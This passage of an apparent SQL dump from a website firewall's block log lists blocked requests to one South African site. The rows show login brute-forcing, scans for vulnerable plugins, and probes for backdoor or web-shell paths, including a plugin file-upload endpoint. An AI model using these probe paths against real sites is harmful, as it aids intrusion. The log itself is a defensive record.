07:19:25','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5749,'2022-03-18 07:19:31','185.185.134.116','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5750,'2022-03-18 08:06:11','191.96.145.244','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5751,'2022-03-18 08:06:15','191.96.145.244','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5752,'2022-03-18 08:06:19','191.96.145.244','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5753,'2022-03-19 04:55:51','47.104.70.199','https://smithandsmith.co.za/wp-login.php','404shield',''),(5754,'2022-03-19 19:55:13','45.151.167.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(5755,'2022-03-19 19:55:16','45.151.167.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(5756,'2022-03-19 19:55:16','45.151.167.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(5757,'2022-03-19 20:45:51','185.220.102.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5758,'2022-03-19 20:45:54','185.220.102.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5759,'2022-03-19 20:45:55','185.220.102.7','https://smithandsmith.co.za/wp-login.php','404shield',''),(5760,'2022-03-20 01:58:31','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5761,'2022-03-20 13:32:21','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5762,'2022-03-20 14:22:12','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5763,'2022-03-20 15:17:33','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5764,'2022-03-20 16:12:55','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5765,'2022-03-20 17:08:17','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5766,'2022-03-20 18:03:27','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5767,'2022-03-20 19:04:58','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5768,'2022-03-20 20:00:51','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5769,'2022-03-20 20:51:04','185.220.100.243','https://smithandsmith.co.za/contact','httpbl',''),(5770,'2022-03-20 20:51:07','185.220.100.243','https://smithandsmith.co.za/','httpbl',''),(5771,'2022-03-20 20:56:57','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5772,'2022-03-20 21:52:51','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5773,'2022-03-20 22:48:57','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5774,'2022-03-20 22:58:47','208.109.23.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(5775,'2022-03-20 23:44:59','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5776,'2022-03-21 00:41:04','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5777,'2022-03-21 01:37:31','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5778,'2022-03-21 02:18:35','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5779,'2022-03-21 02:34:01','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5780,'2022-03-21 03:30:10','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5781,'2022-03-21 04:26:29','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5782,'2022-03-21 05:23:04','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5783,'2022-03-21 06:19:35','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5784,'2022-03-21 07:16:14','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5785,'2022-03-21 08:12:55','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5786,'2022-03-21 08:14:45','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5787,'2022-03-21 08:22:17','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5788,'2022-03-21 09:23:05','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5789,'2022-03-21 09:30:41','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5790,'2022-03-21 09:38:13','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5791,'2022-03-21 09:45:51','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5792,'2022-03-21 09:53:27','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5793,'2022-03-21 10:00:59','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5794,'2022-03-21 10:08:31','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5795,'2022-03-21 10:16:03','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5796,'2022-03-21 10:23:44','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5797,'2022-03-21 10:31:16','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5798,'2022-03-21 10:38:51','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5799,'2022-03-21 10:46:24','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5800,'2022-03-21 10:54:00','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5801,'2022-03-21 11:01:31','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5802,'2022-03-21 11:09:07','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5803,'2022-03-21 11:16:38','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5804,'2022-03-21 11:24:13','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5805,'2022-03-21 11:31:44','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5806,'2022-03-21 11:39:19','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5807,'2022-03-21 11:46:50','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5808,'2022-03-21 11:54:27','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5809,'2022-03-21 12:01:59','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5810,'2022-03-21 12:09:37','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5811,'2022-03-21 12:17:12','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5812,'2022-03-21 12:24:49','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5813,'2022-03-21 12:32:23','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5814,'2022-03-21 12:40:01','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5815,'2022-03-21 12:47:37','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5816,'2022-03-21 12:55:11','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5817,'2022-03-21 13:02:53','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5818,'2022-03-21 13:10:25','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5819,'2022-03-21 13:18:10','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5820,'2022-03-21 13:25:42','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5821,'2022-03-21 13:33:23','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5822,'2022-03-21 13:40:54','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5823,'2022-03-21 13:42:36','185.119.81.109','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5824,'2022-03-21 14:23:42','62.171.137.169','https://smithandsmith.co.za/wp-login.php','404shield',''),(5825,'2022-03-21 14:23:46','62.171.137.169','https://smithandsmith.co.za/wp-login.php','404shield',''),(5826,'2022-03-21 14:23:47','62.171.137.169','https://smithandsmith.co.za/wp-login.php','404shield',''),(5827,'2022-03-21 15:14:11','23.128.248.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(5828,'2022-03-21 15:14:13','23.128.248.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(5829,'2022-03-21 15:14:14','23.128.248.18','https://smithandsmith.co.za/wp-login.php','404shield',''),(5830,'2022-03-22 01:14:51','20.94.58.25','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(5831,'2022-03-22 01:15:07','20.94.58.25','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5832,'2022-03-22 01:15:25','20.94.58.25','https://smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(5833,'2022-03-22 18:20:11','148.72.97.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(5834,'2022-03-23 02:09:51','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5835,'2022-03-23 06:42:45','20.108.243.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(5836,'2022-03-23 06:42:45','20.108.243.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(5837,'2022-03-23 06:42:45','20.108.243.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(5838,'2022-03-23 08:11:29','45.151.167.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(5839,'2022-03-23 08:11:31','45.151.167.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(5840,'2022-03-23 08:11:32','45.151.167.12','https://smithandsmith.co.za/wp-login.php','404shield',''),(5841,'2022-03-23 08:58:48','185.247.226.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(5842,'2022-03-23 08:58:52','185.247.226.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(5843,'2022-03-23 08:58:53','185.247.226.37','https://smithandsmith.co.za/wp-login.php','404shield',''),(5844,'2022-03-23 17:22:46','185.61.154.35','https://smithandsmith.co.za/wp-login.php','404shield',''),(5845,'2022-03-23 19:31:58','193.106.191.112','https://smithandsmith.co.za/wp-admin/sistem.php','404shield',''),(5846,'2022-03-24 11:03:19','23.96.99.29','https://www.smithandsmith.co.za//wp-content/upload.php','404shield',''),(5847,'2022-03-24 13:31:43','212.237.123.112','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php','404shield',''),(5848,'2022-03-24 13:39:10','212.237.123.112','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(5849,'2022-03-24 15:39:17','13.77.67.129','https://www.smithandsmith.co.za/wp-content/wp-logins.php','404shield',''),(5850,'2022-03-24 15:39:23','13.77.67.129','https://www.smithandsmith.co.za/wp-content/wp-admin.php','404shield',''),(5851,'2022-03-24 15:39:25','13.77.67.129','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(5852,'2022-03-24 21:29:45','40.78.40.195','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5853,'2022-03-24 21:30:03','40.78.40.195','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(5854,'2022-03-24 21:30:25','40.78.40.195','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(5855,'2022-03-24 23:21:18','218.38.137.175','https://smithandsmith.co.za/wp-login.php','404shield',''),(5856,'2022-03-24 23:26:24','40.78.40.195','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(5857,'2022-03-24 23:53:10','40.78.40.195','https://www.smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5858,'2022-03-25 00:05:39','40.78.40.195','https://www.smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(5859,'2022-03-25 00:31:21','40.78.40.195','https://www.smithandsmith.co.za/wp-content/export.php','404shield',''),(5860,'2022-03-25 00:44:43','40.78.40.195','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(5861,'2022-03-25 00:46:20','40.78.40.195','https://www.smithandsmith.co.za/wp-content/mu-plugins/db-safe-mode.php','404shield',''),(5862,'2022-03-25 00:47:15','40.78.40.195','https://www.smithandsmith.co.za/wp-content/themes/config.bak.php','404shield',''),(5863,'2022-03-25 01:23:23','5.2.69.50','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5864,'2022-03-25 01:23:24','5.2.69.50','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5865,'2022-03-25 01:23:25','5.2.69.50','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5866,'2022-03-25 02:10:09','94.16.121.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(5867,'2022-03-25 02:10:11','94.16.121.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(5868,'2022-03-25 02:10:12','94.16.121.91','https://smithandsmith.co.za/wp-login.php','404shield',''),(5869,'2022-03-25 02:41:49','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5870,'2022-03-25 18:46:21','20.126.42.201','https://smithandsmith.co.za/wp-login.php','404shield',''),(5871,'2022-03-25 18:46:21','20.126.42.201','https://smithandsmith.co.za/wp-login.php','404shield',''),(5872,'2022-03-25 18:46:21','20.126.42.201','https://smithandsmith.co.za/wp-login.php','404shield',''),(5873,'2022-03-25 23:46:22','193.106.191.112','https://smithandsmith.co.za/wp-content/sistem.php','404shield',''),(5874,'2022-03-26 03:40:21','41.62.180.11','https://www.smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(5875,'2022-03-26 15:35:52','20.90.156.37','https://www.smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(5876,'2022-03-26 15:35:54','20.90.156.37','https://www.smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(5877,'2022-03-26 15:35:56','20.90.156.37','https://www.smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(5878,'2022-03-26 16:43:17','184.168.103.64','https://smithandsmith.co.za/wp-login.php','404shield',''),(5879,'2022-03-26 18:34:12','23.154.177.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(5880,'2022-03-26 18:34:14','23.154.177.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(5881,'2022-03-26 18:34:15','23.154.177.3','https://smithandsmith.co.za/wp-login.php','404shield',''),(5882,'2022-03-26 18:34:17','185.220.102.254','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5883,'2022-03-26 18:34:19','185.220.102.254','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5884,'2022-03-26 19:24:02','185.220.101.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(5885,'2022-03-26 19:24:04','185.220.101.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(5886,'2022-03-26 19:24:05','185.220.101.72','https://smithandsmith.co.za/wp-login.php','404shield',''),(5887,'2022-03-26 19:51:48','20.223.216.190','https://www.smithandsmith.co.za/wp-content/wp-logins.php','404shield',''),(5888,'2022-03-26 19:51:53','20.223.216.190','https://www.smithandsmith.co.za/wp-content/wp-admin.php','404shield',''),(5889,'2022-03-26 19:51:54','20.223.216.190','https://www.smithandsmith.co.za/wp-admin.php','404shield',''),(5890,'2022-03-26 19:59:42','20.22.225.219','https://smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(5891,'2022-03-26 19:59:43','20.22.225.219','https://smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(5892,'2022-03-26 19:59:44','20.22.225.219','https://smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(5893,'2022-03-26 22:40:49','5.62.57.2','https://www.smithandsmith.co.za/wp-content/upload.php','404shield',''),(5894,'2022-03-27 00:07:18','20.65.127.36','https://www.smithandsmith.co.za//wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php','404shield',''),(5895,'2022-03-27 01:05:56','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5896,'2022-03-27 10:16:32','93.113.111.34','https://smithandsmith.co.za/wp-login.php','404shield',''),(5897,'2022-03-28 01:03:24','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5898,'2022-03-28 01:33:03','135.181.69.28','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(5899,'2022-03-28 01:33:08','135.181.69.28','https://smithandsmith.co.za/wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','404shield',''),(5900,'2022-03-28 01:33:15','135.181.69.28','https://smithandsmith.co.za/wp-admin.php?daksldlkdsadas=1','404shield',''),(5901,'2022-03-28 09:54:48','185.16.38.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(5902,'2022-03-28 09:54:50','185.16.38.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(5903,'2022-03-28 09:54:51','185.16.38.110','https://smithandsmith.co.za/wp-login.php','404shield',''),(5904,'2022-03-28 10:42:14','185.100.85.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(5905,'2022-03-28 10:42:18','185.100.85.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(5906,'2022-03-28 10:42:19','185.100.85.22','https://smithandsmith.co.za/wp-login.php','404shield',''),(5907,'2022-03-28 16:48:24','184.168.96.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(5908,'2022-03-29 08:49:50','185.220.100.250','http://smithandsmith.co.za/contact/','httpbl',''),(5909,'2022-03-29 08:49:51','185.220.100.250','http://smithandsmith.co.za/','httpbl',''),(5910,'2022-03-29 14:51:44','204.12.202.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(5911,'2022-03-29 14:52:25','204.12.202.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(5912,'2022-03-29 14:53:58','204.12.202.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(5913,'2022-03-29 16:32:54','20.22.225.219','https://smithandsmith.co.za/wp-content/plugins/upspy/index.php','404shield',''),(5914,'2022-03-29 16:32:55','20.22.225.219','https://smithandsmith.co.za/wp-content/plugins/ubh/index.php','404shield',''),(5915,'2022-03-29 16:32:57','20.22.225.219','https://smithandsmith.co.za/wp-content/plugins/vwcleanerplugin/bump.php?cache','404shield',''),(5916,'2022-03-29 19:08:51','138.128.173.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(5917,'2022-03-30 00:47:14','204.12.202.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(5918,'2022-03-30 00:47:28','204.12.202.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(5919,'2022-03-30 00:47:47','204.12.202.92','https://smithandsmith.co.za/wp-login.php','404shield',''),(5920,'2022-03-30 01:21:20','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5921,'2022-03-31 17:29:56','45.129.56.200','http://smithandsmith.co.za/contact/','httpbl',''),(5922,'2022-03-31 17:30:00','45.129.56.200','http://smithandsmith.co.za/','httpbl',''),(5923,'2022-04-01 02:48:53','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5924,'2022-04-01 06:35:46','185.220.101.52','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5925,'2022-04-01 06:35:52','185.220.101.52','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5926,'2022-04-01 06:35:53','185.220.101.52','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5927,'2022-04-01 06:36:00','185.220.101.22','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5928,'2022-04-01 06:36:01','185.220.101.22','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5929,'2022-04-01 06:36:03','185.220.101.22','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5930,'2022-04-01 07:24:54','51.195.103.74','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5931,'2022-04-01 07:24:56','51.195.103.74','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5932,'2022-04-01 07:24:56','51.195.103.74','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5933,'2022-04-01 15:32:12','185.107.70.56','https://www.smithandsmith.co.za/','httpbl',''),(5934,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/capabilities-pro/readme.txt','404shield',''),(5935,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/emails-verification-for-woocommerce/readme.txt','404shield',''),(5936,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/wp-time-capsule/readme.txt','404shield',''),(5937,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/themegrill-demo-importer/readme.txt','404shield',''),(5938,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/capability-manager-enhanced/readme.txt','404shield',''),(5939,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/mstore-api/readme.txt','404shield',''),(5940,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/woocommerce-upload-files/js/wcuf-admin-menu.js','404shield',''),(5941,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/iwp-client/readme.txt','404shield',''),(5942,'2022-04-02 01:08:13','178.62.125.203','https://www.smithandsmith.co.za/wp-content/plugins/wp-automatic/css/wp-automatic.css','404shield',''),(5943,'2022-04-02 12:36:27','188.166.254.94','https://www.smithandsmith.co.za/wp-content/wp-logins.php','404shield',''),(5944,'2022-04-02 12:36:28','188.166.254.94','https://www.smithandsmith.co.za/wp-content/wp-admin.php','404shield',''),(5945,'2022-04-02 15:27:27','104.236.45.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(5946,'2022-04-02 19:33:23','178.128.48.102','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(5947,'2022-04-02 21:47:06','86.10.29.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(5948,'2022-04-02 23:36:15','185.220.101.65','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5949,'2022-04-02 23:36:16','185.220.101.65','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5950,'2022-04-02 23:36:17','185.220.101.65','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5951,'2022-04-03 00:29:23','185.220.103.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(5952,'2022-04-03 00:29:25','185.220.103.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(5953,'2022-04-03 00:29:27','185.220.103.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(5954,'2022-04-03 02:41:14','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5955,'2022-04-03 03:28:16','185.220.100.241','http://smithandsmith.co.za/contact/','httpbl',''),(5956,'2022-04-03 03:28:16','185.220.100.241','http://smithandsmith.co.za/','httpbl',''),(5957,'2022-04-03 17:50:06','185.201.47.14','https://smithandsmith.co.za/wp-login.php','404shield',''),(5958,'2022-04-04 15:52:38','185.14.97.176','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5959,'2022-04-04 15:52:40','185.14.97.176','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5960,'2022-04-04 15:52:40','185.14.97.176','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5961,'2022-04-04 16:45:36','185.125.168.28','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5962,'2022-04-04 16:45:38','185.125.168.28','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5963,'2022-04-04 16:45:39','185.125.168.28','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5964,'2022-04-04 21:58:45','159.89.2.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(5965,'2022-04-05 17:20:08','159.203.176.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(5966,'2022-04-06 01:53:44','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5967,'2022-04-06 06:04:04','176.165.34.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(5968,'2022-04-06 22:28:13','213.212.132.47','https://smithandsmith.co.za/wp-login.php','404shield',''),(5969,'2022-04-07 16:02:24','35.211.94.153','https://smithandsmith.co.za/wp-login.php','404shield',''),(5970,'2022-04-08 01:38:24','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5971,'2022-04-08 18:07:02','154.38.98.203','https://smithandsmith.co.za/wp-content/plugins/yandex-money-checkout/assets/js/yandex-checkout-admin.js','404shield',''),(5972,'2022-04-09 04:52:19','109.233.192.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(5973,'2022-04-10 00:12:37','210.16.189.15','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5974,'2022-04-10 01:49:01','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5975,'2022-04-10 04:55:26','27.111.82.74','https://smithandsmith.co.za/wp-login.php','404shield',''),(5976,'2022-04-10 05:02:27','199.195.248.80','https://smithandsmith.co.za/wp-login.php','404shield',''),(5977,'2022-04-10 05:02:30','199.195.248.80','https://smithandsmith.co.za/wp-login.php','404shield',''),(5978,'2022-04-10 05:02:31','199.195.248.80','https://smithandsmith.co.za/wp-login.php','404shield',''),(5979,'2022-04-10 05:54:11','185.220.101.74','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5980,'2022-04-10 05:54:12','185.220.101.74','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5981,'2022-04-10 05:54:12','185.220.101.74','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5982,'2022-04-10 05:54:15','185.220.100.244','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5983,'2022-04-10 05:54:16','185.220.100.244','http://smithandsmith.co.za/wp-login.php','httpbl',''),(5984,'2022-04-10 11:09:50','89.136.38.194','http://smithandsmith.co.za/','httpbl',''),(5985,'2022-04-10 11:09:52','89.136.38.194','http://smithandsmith.co.za/','httpbl',''),(5986,'2022-04-10 11:09:52','89.136.38.194','http://smithandsmith.co.za/administrator/index.php?admintools_rescue=you@example.com','adminpw',''),(5987,'2022-04-10 22:01:00','20.123.16.182','https://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/webpack.config.js','404shield',''),(5988,'2022-04-11 01:44:47','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5989,'2022-04-11 04:05:08','162.214.208.84','https://smithandsmith.co.za/wp-login.php','404shield',''),(5990,'2022-04-11 07:12:25','178.33.203.41','https://smithandsmith.co.za/wp-admin/style.php','404shield',''),(5991,'2022-04-11 07:15:28','178.33.203.41','https://smithandsmith.co.za/wp-content/export.php','404shield',''),(5992,'2022-04-11 07:16:56','178.33.203.41','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(5993,'2022-04-11 17:19:18','192.163.197.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(5994,'2022-04-11 19:31:24','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(5995,'2022-04-11 19:31:24','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(5996,'2022-04-11 19:31:24','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(5997,'2022-04-12 18:57:42','151.106.35.235','https://smithandsmith.co.za/wp-login.php','404shield',''),(5998,'2022-04-12 23:37:48','185.220.100.241','http://smithandsmith.co.za/contact/','httpbl',''),(5999,'2022-04-12 23:37:48','185.220.100.241','http://smithandsmith.co.za/','httpbl',''),(6000,'2022-04-12 23:37:49','185.220.100.244','http://smithandsmith.co.za/contact/','httpbl',''),(6001,'2022-04-12 23:37:50','107.189.1.90','http://smithandsmith.co.za/','httpbl',''),(6002,'2022-04-13 14:40:09','20.219.65.242','https://smithandsmith.co.za/wp-admin/includes/','404shield',''),(6003,'2022-04-13 18:16:30','64.235.231.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(6004,'2022-04-14 00:56:34','20.219.65.242','https://smithandsmith.co.za/wp-admin/includes/','404shield',''),(6005,'2022-04-14 01:53:35','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6006,'2022-04-14 01:53:35','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6007,'2022-04-14 01:53:36','176.37.35.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(6008,'2022-04-14 07:54:46','45.12.134.107','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6009,'2022-04-14 07:54:48','45.12.134.107','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6010,'2022-04-14 07:54:49','45.12.134.107','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6011,'2022-04-14 08:54:36','193.189.100.195','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6012,'2022-04-14 08:54:38','193.189.100.195','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6013,'2022-04-14 08:54:38','193.189.100.195','http://smithandsmith.co.za/wp-login.php','httpbl',''),(6014,'2022-04-14 16:06:16','150.95.110.113','https://smithandsmith.co.za/wp-login.php','404shield',''),(6015,'2022-04-14 20:57:48','45.55.52.204','https://www.smithandsmith.co.za/wp-admin/style.php','404shield',''),(6016,'2022-04-14 21:03:48','45.55.52.204','https://www.smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(6017,'2022-04-14 